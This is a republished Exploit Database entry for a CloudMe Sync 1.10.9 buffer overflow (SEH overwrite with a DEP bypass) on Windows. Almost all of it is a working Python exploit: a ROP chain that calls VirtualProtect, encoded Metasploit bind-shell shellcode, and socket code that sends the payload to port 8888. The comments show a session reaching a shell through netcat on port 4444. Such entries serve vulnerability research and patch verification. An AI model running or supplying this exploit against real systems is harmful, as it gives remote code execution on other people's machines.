CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)

• Exploit Database
• 123 阅读

• 作者： Juan Prescotto
  日期： 2018-05-28
• 类别：

  • remote
  平台：

  • windows_x86-64
• 来源：https://www.exploit-db.com/exploits/44784/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141

  # Exploit: CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) # Date: 2018-05-27 # Author: Juan Prescotto # Tested Against: Win7 Pro SP1 64 bit # Software Download: https://www.cloudme.com/downloads/CloudMe_1109.exe # Tested Against Version: 1.10.9 # Special Thanks to my wife for allowing me spend countless hours on this passion of mine # Credit: Thanks to John Page (aka hyp3rlinx) (https://www.exploit-db.com/exploits/44027/) # for his work on the original exploit # Bad Characers: \x00 # SEH Offset: 2236 # Non-Participating Modules Used: Qt5Gui.dll, Qt5Core.dll,libstdc++-6.dll, libgcc_s_dw2-1.dll, libwinpthread-1.dll # Victim Machine: # C:\>netstat -nao | find "8888" # TCP0.0.0.0:88880.0.0.0:0 LISTENING 2640 # C:\>tasklist | find "2640" # CloudMe.exe2640 Console1 36,632 K # Attacking Machine: # root@kali:~/Desktop# python cloudme.py # CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass # [+] CloudMe Target IP> 192.168.12.4 # Sending buffer overflow to CloudMe Service # Target Should be Running a Bind Shell on Port 4444! # root@kali:~/Desktop# nc -nv 192.168.12.4 4444 # (UNKNOWN) [192.168.12.4] 4444 (?) open # Microsoft Windows [Version 6.1.7601] # Copyright (c) 2009 Microsoft Corporation. All rights reserved. # C:\Users\jprescotto\AppData\Local\Programs\CloudMe\CloudMe> # My register setup when VirtualProtect() is called (Defeat DEP) : -- # EAX = NOP (0x90909090) # ECX = lpOldProtect (ptr to W address) # EDX = NewProtect (0x40) # EBX = dwSize # ESP = lPAddress (automatic) # EBP = ReturnTo (ptr to jmp esp) # ESI = ptr to VirtualProtect() # EDI = ROP NOP (RETN)   #!/usr/bin/python   import socket,struct print &apos;CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass&apos;   def create_rop_chain():   rop chain generated with mona.py - www.corelan.be rop_gadgets = [ 0x61d1e7fe,POP ECXRETN [Qt5Gui.dll] 0x690398a8,ptr to &VirtualProtect() [IAT Qt5Core.dll] 0x6fe70610,MOV EAX,DWORD PTR DS:[ECX]RETN [libstdc++-6.dll] 0x61c40a6f,XCHG EAX,ESIRETN [Qt5Gui.dll] 0x68c8ea5a,POP EBPRETN [Qt5Core.dll] 0x68d652e1,& call esp [Qt5Core.dll] 0x68fa7ca2,POP EDXRETN [Qt5Core.dll] 0xfffffdff,Value to negate, will become 0x00000201 0x6eb47092,NEG EDXRETN [libgcc_s_dw2-1.dll] 0x68d52747,POP EBXRETN [Qt5Core.dll] 0xffffffff, 0x68f948bc,INC EBXRETN [Qt5Core.dll] 0x68f8063c,ADD EBX,EDXADD AL,0ARETN [Qt5Core.dll] 0x68f9a472,POP EDXRETN [Qt5Core.dll] 0xffffffc0,Value to negate, will become 0x00000040 0x6eb47092,NEG EDXRETN [libgcc_s_dw2-1.dll] 0x61f057ab,POP ECXRETN [Qt5Gui.dll] 0x6eb5efa3,&Writable location [libgcc_s_dw2-1.dll] 0x61dc14d1,POP EDIRETN [Qt5Gui.dll] 0x64b4ed0c,RETN (ROP NOP) [libwinpthread-1.dll] 0x61ba6245,POP EAXRETN [Qt5Gui.dll] 0x90909090,nop 0x61b45ea3,PUSHADRETN [Qt5Gui.dll] ] return &apos;&apos;.join(struct.pack(&apos;<I&apos;, _) for _ in rop_gadgets)   rop_chain = create_rop_chain()     #msf payload(shell_bind_tcp) > show options #Module options (payload/windows/shell_bind_tcp): # NameCurrent SettingRequiredDescription # EXITFUNCthreadyes Exit technique (Accepted: &apos;&apos;, seh, thread, process, none) # LPORT 4444yes The listen port # RHOSTno The target address #msf payload(shell_bind_tcp) > generate -b &apos;\x00&apos; -t py # windows/shell_bind_tcp - 355 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai shellcode ="" shellcode += "\xda\xcf\xba\x8c\x90\x7b\x70\xd9\x74\x24\xf4\x5e\x33" shellcode += "\xc9\xb1\x53\x31\x56\x17\x83\xee\xfc\x03\xda\x83\x99" shellcode += "\x85\x1e\x4b\xdf\x66\xde\x8c\x80\xef\x3b\xbd\x80\x94" shellcode += "\x48\xee\x30\xde\x1c\x03\xba\xb2\xb4\x90\xce\x1a\xbb" shellcode += "\x11\x64\x7d\xf2\xa2\xd5\xbd\x95\x20\x24\x92\x75\x18" shellcode += "\xe7\xe7\x74\x5d\x1a\x05\x24\x36\x50\xb8\xd8\x33\x2c" shellcode += "\x01\x53\x0f\xa0\x01\x80\xd8\xc3\x20\x17\x52\x9a\xe2" shellcode += "\x96\xb7\x96\xaa\x80\xd4\x93\x65\x3b\x2e\x6f\x74\xed" shellcode += "\x7e\x90\xdb\xd0\x4e\x63\x25\x15\x68\x9c\x50\x6f\x8a" shellcode += "\x21\x63\xb4\xf0\xfd\xe6\x2e\x52\x75\x50\x8a\x62\x5a" shellcode += "\x07\x59\x68\x17\x43\x05\x6d\xa6\x80\x3e\x89\x23\x27" shellcode += "\x90\x1b\x77\x0c\x34\x47\x23\x2d\x6d\x2d\x82\x52\x6d" shellcode += "\x8e\x7b\xf7\xe6\x23\x6f\x8a\xa5\x2b\x5c\xa7\x55\xac" shellcode += "\xca\xb0\x26\x9e\x55\x6b\xa0\x92\x1e\xb5\x37\xd4\x34" shellcode += "\x01\xa7\x2b\xb7\x72\xee\xef\xe3\x22\x98\xc6\x8b\xa8" shellcode += "\x58\xe6\x59\x44\x50\x41\x32\x7b\x9d\x31\xe2\x3b\x0d" shellcode += "\xda\xe8\xb3\x72\xfa\x12\x1e\x1b\x93\xee\xa1\x32\x38" shellcode += "\x66\x47\x5e\xd0\x2e\xdf\xf6\x12\x15\xe8\x61\x6c\x7f" shellcode += "\x40\x05\x25\x69\x57\x2a\xb6\xbf\xff\xbc\x3d\xac\x3b" shellcode += "\xdd\x41\xf9\x6b\x8a\xd6\x77\xfa\xf9\x47\x87\xd7\x69" shellcode += "\xeb\x1a\xbc\x69\x62\x07\x6b\x3e\x23\xf9\x62\xaa\xd9" shellcode += "\xa0\xdc\xc8\x23\x34\x26\x48\xf8\x85\xa9\x51\x8d\xb2" shellcode += "\x8d\x41\x4b\x3a\x8a\x35\x03\x6d\x44\xe3\xe5\xc7\x26" shellcode += "\x5d\xbc\xb4\xe0\x09\x39\xf7\x32\x4f\x46\xd2\xc4\xaf" shellcode += "\xf7\x8b\x90\xd0\x38\x5c\x15\xa9\x24\xfc\xda\x60\xed" shellcode += "\x1c\x39\xa0\x18\xb5\xe4\x21\xa1\xd8\x16\x9c\xe6\xe4" shellcode += "\x94\x14\x97\x12\x84\x5d\x92\x5f\x02\x8e\xee\xf0\xe7" shellcode += "\xb0\x5d\xf0\x2d" ip=raw_input(&apos;[+] CloudMe Target IP> &apos;)   stack_pivot=struct.pack(&apos;<L&apos;,0x61d95f58) {pivot 3492 / 0xda4} (Lands us into rop nop chain --> rop_chain) :SUB ESP,8ADD ESP,0D8CPOP EBXPOP ESIPOP EDIPOP EBPRETN 0x08** [Qt5Gui.dll] ** | {PAGE_EXECUTE_READ} rop_nop1=struct.pack(&apos;<L&apos;,0x68b1a714) * 300RETN 0x10** [Qt5Core.dll] ** | {PAGE_EXECUTE_READ} rop_nop2=struct.pack(&apos;<L&apos;,0x61c6fc53) * 50RETN** [Qt5Gui.dll] ** | {PAGE_EXECUTE_READ} nop = "\x90" * 20   payload = "A" * 2236 + stack_pivot + rop_nop1 + rop_nop2 + rop_chain + nop + shellcode + "B"*(5600-len(rop_nop1)-len(rop_nop2)-len(rop_chain)-len(nop)-len(shellcode))     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip,8888)) s.send(payload) print &apos;Sending buffer overflow to CloudMe Service&apos; print &apos;Target Should be Running a Bind Shell on Port 4444!&apos;